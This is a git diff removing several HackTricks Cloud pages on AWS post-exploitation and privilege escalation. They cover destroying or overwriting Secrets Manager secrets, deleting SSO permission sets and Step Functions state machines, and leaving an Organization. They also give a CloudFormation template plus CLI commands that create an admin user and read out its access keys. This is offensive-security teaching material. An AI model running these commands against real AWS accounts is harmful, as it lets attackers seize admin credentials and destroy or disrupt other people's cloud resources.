-{% endhint %} - -## Organizations - -For more info about AWS Organizations check: - -{% content-ref url="../aws-services/aws-organizations-enum.md" %} -[aws-organizations-enum.md](../aws-services/aws-organizations-enum.md) -{% endcontent-ref %} - -### Leave the Org - -{% code overflow="wrap" %} -```bash -aws organizations deregister-account --account-id --region -``` -{% endcode %} - -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} diff --git a/pentesting-cloud/aws-security/aws-post-exploitation/aws-secrets-manager-post-exploitation.md b/pentesting-cloud/aws-security/aws-post-exploitation/aws-secrets-manager-post-exploitation.md deleted file mode 100644 index cc0591b88..000000000 --- a/pentesting-cloud/aws-security/aws-post-exploitation/aws-secrets-manager-post-exploitation.md +++ /dev/null @@ -1,76 +0,0 @@ -# AWS - Secrets Manager Post Exploitation - -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} - -## Secrets Manager - -For more information check: - -{% content-ref url="../aws-services/aws-secrets-manager-enum.md" %} -[aws-secrets-manager-enum.md](../aws-services/aws-secrets-manager-enum.md) -{% endcontent-ref %} - -### Read Secrets - -The **secrets themself are sensitive information**, [check the privesc page](../aws-privilege-escalation/aws-secrets-manager-privesc.md) to learn how to read them. - -### DoS Change Secret Value - -Changing the value of the secret you could **DoS all the system that depends on that value.** - -{% hint style="warning" %} -Note that previous values are also stored, so it's easy to just go back to the previous value. -{% endhint %} - -```bash -# Requires permission secretsmanager:PutSecretValue -aws secretsmanager put-secret-value \ - --secret-id MyTestSecret \ - --secret-string "{\"user\":\"diegor\",\"password\":\"EXAMPLE-PASSWORD\"}" -``` - -### DoS Change KMS key - -```bash -aws secretsmanager update-secret \ - --secret-id MyTestSecret \ - --kms-key-id arn:aws:kms:us-west-2:123456789012:key/EXAMPLE1-90ab-cdef-fedc-ba987EXAMPLE -``` - -### DoS Deleting Secret - -The minimum number of days to delete a secret are 7 - -```bash -aws secretsmanager delete-secret \ - --secret-id MyTestSecret \ - --recovery-window-in-days 7 -``` - -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} diff --git a/pentesting-cloud/aws-security/aws-post-exploitation/aws-ses-post-exploitation.md b/pentesting-cloud/aws-security/aws-post-exploitation/aws-ses-post-exploitation.md deleted file mode 100644 index 6e41ef586..000000000 --- a/pentesting-cloud/aws-security/aws-post-exploitation/aws-ses-post-exploitation.md +++ /dev/null @@ -1,117 +0,0 @@ -# AWS - SES Post Exploitation - -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} - -## SES - -For more information check: - -{% content-ref url="../aws-services/aws-ses-enum.md" %} -[aws-ses-enum.md](../aws-services/aws-ses-enum.md) -{% endcontent-ref %} - -### `ses:SendEmail` - -Send an email. - -{% code overflow="wrap" %} -```bash -aws ses send-email --from sender@example.com --destination file://emails.json --message file://message.json -aws sesv2 send-email --from sender@example.com --destination file://emails.json --message file://message.json -``` -{% endcode %} - -Still to test. - -### `ses:SendRawEmail` - -Send an email. - -```bash -aws ses send-raw-email --raw-message file://message.json -``` - -Still to test. - -### `ses:SendTemplatedEmail` - -Send an email based on a template. - -{% code overflow="wrap" %} -```bash -aws ses send-templated-email --source --destination --template -``` -{% endcode %} - -Still to test. - -### `ses:SendBulkTemplatedEmail` - -Send an email to multiple destinations - -```bash -aws ses send-bulk-templated-email --source --template -``` - -Still to test. - -### `ses:SendBulkEmail` - -Send an email to multiple destinations. - -``` -aws sesv2 send-bulk-email --default-content --bulk-email-entries -``` - -### `ses:SendBounce` - -Send a **bounce email** over a received email (indicating that the email couldn't be received). This can only be done **up to 24h after receiving** the email. - -{% code overflow="wrap" %} -```bash -aws ses send-bounce --original-message-id --bounce-sender --bounced-recipient-info-list -``` -{% endcode %} - -Still to test. - -### `ses:SendCustomVerificationEmail` - -This will send a customized verification email. You might need permissions also to created the template email. - -{% code overflow="wrap" %} -```bash -aws ses send-custom-verification-email --email-address --template-name -aws sesv2 send-custom-verification-email --email-address --template-name -``` -{% endcode %} - -Still to test. - -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} diff --git a/pentesting-cloud/aws-security/aws-post-exploitation/aws-sso-and-identitystore-post-exploitation.md b/pentesting-cloud/aws-security/aws-post-exploitation/aws-sso-and-identitystore-post-exploitation.md deleted file mode 100644 index ccffb5ede..000000000 --- a/pentesting-cloud/aws-security/aws-post-exploitation/aws-sso-and-identitystore-post-exploitation.md +++ /dev/null @@ -1,53 +0,0 @@ -# AWS - SSO & identitystore Post Exploitation - -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} - -## SSO & identitystore - -For more information check: - -{% content-ref url="../aws-services/aws-iam-enum.md" %} -[aws-iam-enum.md](../aws-services/aws-iam-enum.md) -{% endcontent-ref %} - -### `sso:DeletePermissionSet` | `sso:PutPermissionsBoundaryToPermissionSet` | `sso:DeleteAccountAssignment` - -These permissions can be used to disrupt permissions: - -{% code overflow="wrap" %} -```bash -aws sso-admin delete-permission-set --instance-arn --permission-set-arn - -aws sso-admin put-permissions-boundary-to-permission-set --instance-arn --permission-set-arn --permissions-boundary-policy-arn - -aws sso-admin delete-account-assignment --instance-arn --target-id --target-type --permission-set-arn --principal-type --principal-id -``` -{% endcode %} - -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} diff --git a/pentesting-cloud/aws-security/aws-post-exploitation/aws-stepfunctions-post-exploitation.md b/pentesting-cloud/aws-security/aws-post-exploitation/aws-stepfunctions-post-exploitation.md deleted file mode 100644 index 67719fd73..000000000 --- a/pentesting-cloud/aws-security/aws-post-exploitation/aws-stepfunctions-post-exploitation.md +++ /dev/null @@ -1,105 +0,0 @@ -# AWS - Step Functions Post Exploitation - -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} - -## Step Functions - -For more information about this AWS service, check: - -{% content-ref url="../aws-services/aws-stepfunctions-enum.md" %} -[aws-stepfunctions-enum.md](../aws-services/aws-stepfunctions-enum.md) -{% endcontent-ref %} - -### `states:RevealSecrets` - -This permission allows to **reveal secret data inside an execution**. For it, it's needed to set Inspection level to TRACE and the revealSecrets parameter to true. - -
- -### `states:DeleteStateMachine`, `states:DeleteStateMachineVersion`, `states:DeleteStateMachineAlias` - -An attacker with these permissions would be able to permanently delete state machines, their versions, and aliases. This can disrupt critical workflows, result in data loss, and require significant time to recover and restore the affected state machines. In addition, it would allow an attacker to cover the tracks used, disrupt forensic investigations, and potentially cripple operations by removing essential automation processes and state configurations. - -{% hint style="info" %} -* Deleting a state machine you also delete all its associated versions and aliases. -* Deleting a state machine alias you do not delete the state machine versions referecing this alias. -* It is not possible to delete a state machine version currently referenced by one o more aliases. -{% endhint %} - -```bash -# Delete state machine -aws stepfunctions delete-state-machine --state-machine-arn -# Delete state machine version -aws stepfunctions delete-state-machine-version --state-machine-version-arn -# Delete state machine alias -aws stepfunctions delete-state-machine-alias --state-machine-alias-arn -``` - -* **Potential Impact**: Disruption of critical workflows, data loss, and operational downtime. - -### `states:UpdateMapRun` - -An attacker with this permission would be able to manipulate the Map Run failure configuration and parallel setting, being able to increase or decrease the maximum number of child workflow executions allowed, affecting directly and performance of the service. In addition, an attacker could tamper with the tolerated failure percentage and count, being able to decrease this value to 0 so every time an item fails, the whole map run would fail, affecting directly to the state machine execution and potentially disrupting critical workflows. - -{% code overflow="wrap" %} -```bash -aws stepfunctions update-map-run --map-run-arn [--max-concurrency ] [--tolerated-failure-percentage ] [--tolerated-failure-count ] -``` -{% endcode %} - -* **Potential Impact**: Performance degradation, and disruption of critical workflows. - -### `states:StopExecution` - -An attacker with this permission could be able to stop the execution of any state machine, disrupting ongoing workflows and processes. This could lead to incomplete transactions, halted business operations, and potential data corruption. - -{% hint style="warning" %} -This action is not supported by **express state machines**. -{% endhint %} - -{% code overflow="wrap" %} -```bash -aws stepfunctions stop-execution --execution-arn [--error ] [--cause ] -``` -{% endcode %} - -* **Potential Impact**: Disruption of ongoing workflows, operational downtime, and potential data corruption. - -### `states:TagResource`, `states:UntagResource` - -An attacker could add, modify, or remove tags from Step Functions resources, disrupting your organization's cost allocation, resource tracking, and access control policies based on tags. - -```bash -aws stepfunctions tag-resource --resource-arn --tags Key=,Value= -aws stepfunctions untag-resource --resource-arn --tag-keys -``` - -**Potential Impact**: Disruption of cost allocation, resource tracking, and tag-based access control policies. - -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} diff --git a/pentesting-cloud/aws-security/aws-post-exploitation/aws-vpn-post-exploitation.md b/pentesting-cloud/aws-security/aws-post-exploitation/aws-vpn-post-exploitation.md deleted file mode 100644 index 4ca191307..000000000 --- a/pentesting-cloud/aws-security/aws-post-exploitation/aws-vpn-post-exploitation.md +++ /dev/null @@ -1,39 +0,0 @@ -# AWS - VPN Post Exploitation - -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} - -## VPN - -For more information: - -{% content-ref url="../aws-services/aws-ec2-ebs-elb-ssm-vpc-and-vpn-enum/" %} -[aws-ec2-ebs-elb-ssm-vpc-and-vpn-enum](../aws-services/aws-ec2-ebs-elb-ssm-vpc-and-vpn-enum/) -{% endcontent-ref %} - -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} diff --git a/pentesting-cloud/aws-security/aws-privilege-escalation/README.md b/pentesting-cloud/aws-security/aws-privilege-escalation/README.md deleted file mode 100644 index 5d96ec8ca..000000000 --- a/pentesting-cloud/aws-security/aws-privilege-escalation/README.md +++ /dev/null @@ -1,51 +0,0 @@ -# AWS - Privilege Escalation - -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} - -## AWS Privilege Escalation - -The way to escalate your privileges in AWS is to have enough permissions to be able to, somehow, access other roles/users/groups privileges. Chaining escalations until you have admin access over the organization. - -{% hint style="warning" %} -AWS has **hundreds** (if not thousands) of **permissions** that an entity can be granted. In this book you can find **all the permissions that I know** that you can abuse to **escalate privileges**, but if you **know some path** not mentioned here, **please share it**. -{% endhint %} - -{% hint style="danger" %} -If an IAM policy has `"Effect": "Allow"` and `"NotAction": "Someaction"` indicating a **resource**... that means that the **allowed principal** has **permission to do ANYTHING but that specified action**.\ -So remember that this is another way to **grant privileged permissions** to a principal. -{% endhint %} - -**The pages of this section are ordered by AWS service. In there you will be able to find permissions that will allow you to escalate privileges.** - -## Tools - -* [https://github.com/RhinoSecurityLabs/Security-Research/blob/master/tools/aws-pentest-tools/aws\_escalate.py](https://github.com/RhinoSecurityLabs/Security-Research/blob/master/tools/aws-pentest-tools/aws_escalate.py) -* [Pacu](https://github.com/RhinoSecurityLabs/pacu) - -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} diff --git a/pentesting-cloud/aws-security/aws-privilege-escalation/aws-chime-privesc.md b/pentesting-cloud/aws-security/aws-privilege-escalation/aws-chime-privesc.md deleted file mode 100644 index 7294ee888..000000000 --- a/pentesting-cloud/aws-security/aws-privilege-escalation/aws-chime-privesc.md +++ /dev/null @@ -1,35 +0,0 @@ -# AWS - Chime Privesc - -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} - -### chime:CreateApiKey - -TODO - -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} diff --git a/pentesting-cloud/aws-security/aws-privilege-escalation/aws-cloudformation-privesc/iam-passrole-cloudformation-createstack-and-cloudformation-describestacks.md b/pentesting-cloud/aws-security/aws-privilege-escalation/aws-cloudformation-privesc/iam-passrole-cloudformation-createstack-and-cloudformation-describestacks.md deleted file mode 100644 index 8147ce381..000000000 --- a/pentesting-cloud/aws-security/aws-privilege-escalation/aws-cloudformation-privesc/iam-passrole-cloudformation-createstack-and-cloudformation-describestacks.md +++ /dev/null @@ -1,109 +0,0 @@ -# iam:PassRole, cloudformation:CreateStack,and cloudformation:DescribeStacks - -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} - -An attacker could for example use a **cloudformation template** that generates **keys for an admin** user like: - -```json -{ - "Resources": { - "AdminUser": { - "Type": "AWS::IAM::User" - }, - "AdminPolicy": { - "Type": "AWS::IAM::ManagedPolicy", - "Properties": { - "Description" : "This policy allows all actions on all resources.", - "PolicyDocument": { - "Version": "2012-10-17", - "Statement": [ - { - "Effect": "Allow", - "Action": [ - "*" - ], - "Resource": "*" - }] - }, - "Users": [{ - "Ref": "AdminUser" - }] - } - }, - "MyUserKeys": { - "Type": "AWS::IAM::AccessKey", - "Properties": { - "UserName": { - "Ref": "AdminUser" - } - } - } - }, - "Outputs": { - "AccessKey": { - "Value": { - "Ref": "MyUserKeys" - }, - "Description": "Access Key ID of Admin User" - }, - "SecretKey": { - "Value": { - "Fn::GetAtt": [ - "MyUserKeys", - "SecretAccessKey" - ] - }, - "Description": "Secret Key of Admin User" - } - } -} -``` - -Then **generate the cloudformation stack**: - -```bash -aws cloudformation create-stack --stack-name privesc \ - --template-url https://privescbucket.s3.amazonaws.com/IAMCreateUserTemplate.json \ - --role arn:aws:iam::[REDACTED]:role/adminaccess \ - --capabilities CAPABILITY_IAM --region us-west-2 -``` - -**Wait for a couple of minutes** for the stack to be generated and then **get the output** of the stack where the **credentials are stored**: - -```bash -aws cloudformation describe-stacks \ - --stack-name arn:aws:cloudformation:us-west2:[REDACTED]:stack/privesc/b4026300-d3fe-11e9-b3b5-06fe8be0ff5e \ - --region uswest-2 -``` - -### References - -* [https://bishopfox.com/blog/privilege-escalation-in-aws](https://bishopfox.com/blog/privilege-escalation-in-aws) - -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} diff --git a/pentesting-cloud/aws-security/aws-privilege-escalation/aws-codepipeline-privesc.md b/pentesting-cloud/aws-security/aws-privilege-escalation/aws-codepipeline-privesc.md deleted file mode 100644 index d9fdae9de..000000000 --- a/pentesting-cloud/aws-security/aws-privilege-escalation/aws-codepipeline-privesc.md +++ /dev/null @@ -1,63 +0,0 @@ -# AWS - Codepipeline Privesc - -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} - -## codepipeline - -For more info about codepipeline check: - -{% content-ref url="../aws-services/aws-datapipeline-codepipeline-codebuild-and-codecommit.md" %} -[aws-datapipeline-codepipeline-codebuild-and-codecommit.md](../aws-services/aws-datapipeline-codepipeline-codebuild-and-codecommit.md) -{% endcontent-ref %} - -### `iam:PassRole`, `codepipeline:CreatePipeline`, `codebuild:CreateProject, codepipeline:StartPipelineExecution` - -When creating a code pipeline you can indicate a **codepipeline IAM Role to run**, therefore you could compromise them. - -Apart from the previous permissions you would need **access to the place where the code is stored** (S3, ECR, github, bitbucket...) - -I tested this doing the process in the web page, the permissions indicated previously are the not List/Get ones needed to create a codepipeline, but for creating it in the web you will also need: `codebuild:ListCuratedEnvironmentImages, codebuild:ListProjects, codebuild:ListRepositories, codecommit:ListRepositories, events:PutTargets, codepipeline:ListPipelines, events:PutRule, codepipeline:ListActionTypes, cloudtrail:` - -During the **creation of the build project** you can indicate a **command to run** (rev shell?) and to run the build phase as **privileged user**, that's the configuration the attacker needs to compromise: - -![](<../../../.gitbook/assets/image (276).png>) - -![](<../../../.gitbook/assets/image (181).png>) - -### ?`codebuild:UpdateProject, codepipeline:UpdatePipeline, codepipeline:StartPipelineExecution` - -It might be possible to modify the role used and the command executed on a codepipeline with the previous permissions. - -### `codepipeline:pollforjobs` - -[AWS mentions](https://docs.aws.amazon.com/codepipeline/latest/APIReference/API_PollForJobs.html): - -> When this API is called, CodePipeline **returns temporary credentials for the S3 bucket** used to store artifacts for the pipeline, if the action requires access to that S3 bucket for input or output artifacts. This API also **returns any secret values defined for the action**. - -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} diff --git a/pentesting-cloud/aws-security/aws-privilege-escalation/aws-codestar-privesc/README.md b/pentesting-cloud/aws-security/aws-privilege-escalation/aws-codestar-privesc/README.md deleted file mode 100644 index 106d50e48..000000000 --- a/pentesting-cloud/aws-security/aws-privilege-escalation/aws-codestar-privesc/README.md +++ /dev/null @@ -1,99 +0,0 @@ -# AWS - Codestar Privesc - -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
